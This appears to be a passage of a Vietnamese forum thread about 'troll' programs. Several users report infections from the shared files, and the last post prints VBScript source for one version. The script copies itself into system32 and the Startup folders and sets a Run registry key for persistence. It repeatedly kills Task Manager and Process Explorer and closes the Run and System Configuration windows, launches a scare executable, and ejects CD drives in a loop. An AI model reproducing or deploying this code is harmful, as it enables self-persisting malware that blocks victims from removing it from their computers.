Reply
 
Thread Tools
  #371  
Old 21-12-2012, 09:41
onlylove1493 onlylove1493 is offline
K.I.A
Join Date: 08-2012
Location: TP.HCM
Posts: 22
Re: [Hội những người thích troll]Ứng dụng để troll

đm thớt
dính virus possiblehostsfilehijack mẹ rồi
giờ cứ mở máy là nó hiện 1 đống cmd nhảy liên tục
rồi bị mất file host trong etc nữa
thuốc
Reply With Quote
  #372  
Old 01-01-2013, 21:25
thiennguyen1502 thiennguyen1502 is offline
Junior Member
Join Date: 11-2011
Location: Biên Hòa, Đồng Nai
Posts: 21
Re: [Hội những người thích troll]Ứng dụng để troll

Quote:
Originally Posted by onlylove1493 View Post
đm thớt
dính virus possiblehostsfilehijack mẹ rồi
giờ cứ mở máy là nó hiện 1 đống cmd nhảy liên tục
rồi bị mất file host trong etc nữa
thuốc
không phải mất file host đâu thým ơi. nó ẩn kỹ lắm, copy file host từ máy khác chép đè vào thui
Reply With Quote
  #373  
Old 02-01-2013, 20:23
DevilAndSunshine DevilAndSunshine is offline
Senior Member
Join Date: 09-2012
Posts: 195
Re: [Hội những người thích troll]Ứng dụng để troll

đang chạy win 8 mấy cái kia éo cái nào chạy dc.DM thớt
Reply With Quote
  #374  
Old 02-01-2013, 20:33
TheTun1995 TheTun1995 is offline
K.I.A
Join Date: 12-2012
Posts: 7
Re: [Hội những người thích troll]Ứng dụng để troll

em down k dc cái nào hết.
up len mediafire di bác
Reply With Quote
  #375  
Old 02-01-2013, 20:35
hatucdao2712 hatucdao2712 is offline
Member
Join Date: 06-2012
Posts: 42
Re: [Hội những người thích troll]Ứng dụng để troll

có ai rì viu lại cái gì xảy ra nếu bật lên ko...e xài win8, ko chạy đc gì hết
Reply With Quote
  #376  
Old 02-01-2013, 20:51
kyms kyms is offline
K.I.A
Join Date: 11-2012
Posts: 0
Re: [Hội những người thích troll]Ứng dụng để troll

test trên máy ảo an toàn, không đau
Reply With Quote
  #377  
Old 02-01-2013, 20:53
danhphaiclonevibiban danhphaiclonevibiban is offline
Senior Member
Join Date: 10-2012
Posts: 213
Re: [Hội những người thích troll]Ứng dụng để troll

mấy thím cho e hỏi, sau khi mở cái ver1 thì nó lẩm bẩm miết, e bật task manager tắt cái processers audio thì nó mất luôn tiếng, sửa làm sao bây h ạ?
Reply With Quote
  #378  
Old 02-01-2013, 21:42
My.Heart.Is.Dead's Avatar
My.Heart.Is.Dead My.Heart.Is.Dead is offline
Junior Member
Join Date: 12-2012
Location: Nơi màn đêm buông xuống ..........
Posts: 26
Re: [Hội những người thích troll]Ứng dụng để troll

Độc các cmt mà đau ruột vl
Reply With Quote
  #379  
Old 05-01-2013, 14:39
n.v.b's Avatar
n.v.b n.v.b is offline
Member
Join Date: 11-2012
Posts: 67
Re: [Hội những người thích troll]Ứng dụng để troll

fbgdsaXWDADXA
Reply With Quote
  #380  
Old 05-01-2013, 15:18
mistake37 mistake37 is offline
Senior Member
Join Date: 02-2007
Posts: 1,876
Re: [Hội những người thích troll]Ứng dụng để troll

Source v9 hay v11 gì éo biết, đậu má thằng thớt

Code:
Set objRandom = CreateObject( "System.Random" )

Set wshShell = CreateObject("WScript.Shell")

Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

Set objFSO = CreateObject("Scripting.FileSystemObject")

Set objFolder = objFSO.GetFolder(".")randomfolder =  "c:\windows\system32\" & objRandom.Next_2( 1000, 9999 ) & "\"

objCreate = objFSO.CreateFolder(randomfolder)

randomname = randomfolder & objRandom.Next_2( 1000, 9999 ) & ".vbe"

parama = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbe"+  chr(34) + " " + chr(34) + randomname + chr(34)

paramb = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbe"+  chr(34) + " " + chr(34) + "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" + chr(34)

paramc = "cmd.exe /c copy "+ chr(34) + objFSO.GetAbsolutePathName(objFolder) + "\*.vbe"+  chr(34) + " " + chr(34) + "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" + chr(34)

wshShell.Run parama , 0, True

wshShell.Run paramb , 0, True

wshShell.Run paramc , 0, Truereg = "wscript.exe //b //nologo " + chr(34) + randomname + chr(34)do

sleeptime = objRandom.Next_2( 10, 40 )

wshShell.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TurboTv11", reg, "REG_SZ"

dteWait = DateAdd("s", sleeptime, Now())

Do Until (Now() > dteWait)

if wshShell.appactivate("Run") then wshShell.sendkeys "%{F4}" 

if wshShell.appactivate("System Configuration") then wshShell.sendkeys "%{F4}" 

wshShell.Run "taskkill /im taskmgr.exe", 0, True

wshShell.Run "taskkill /im taskmgrs.exe", 0, True

wshShell.Run "taskkill /f /t /im procexp.exe", 0, True

wshShell.Run "taskkill /f /t /im procexp64.exe", 0, True

Loop

wscript.Sleep sleeptime

wshShell.Run "C:\Windows\Web\Scary.exe"

wscript.Sleep 5500

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

loop
Reply With Quote
Reply

« Previous Thread | Next Thread »
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


All times are GMT +7. The time now is 10:46.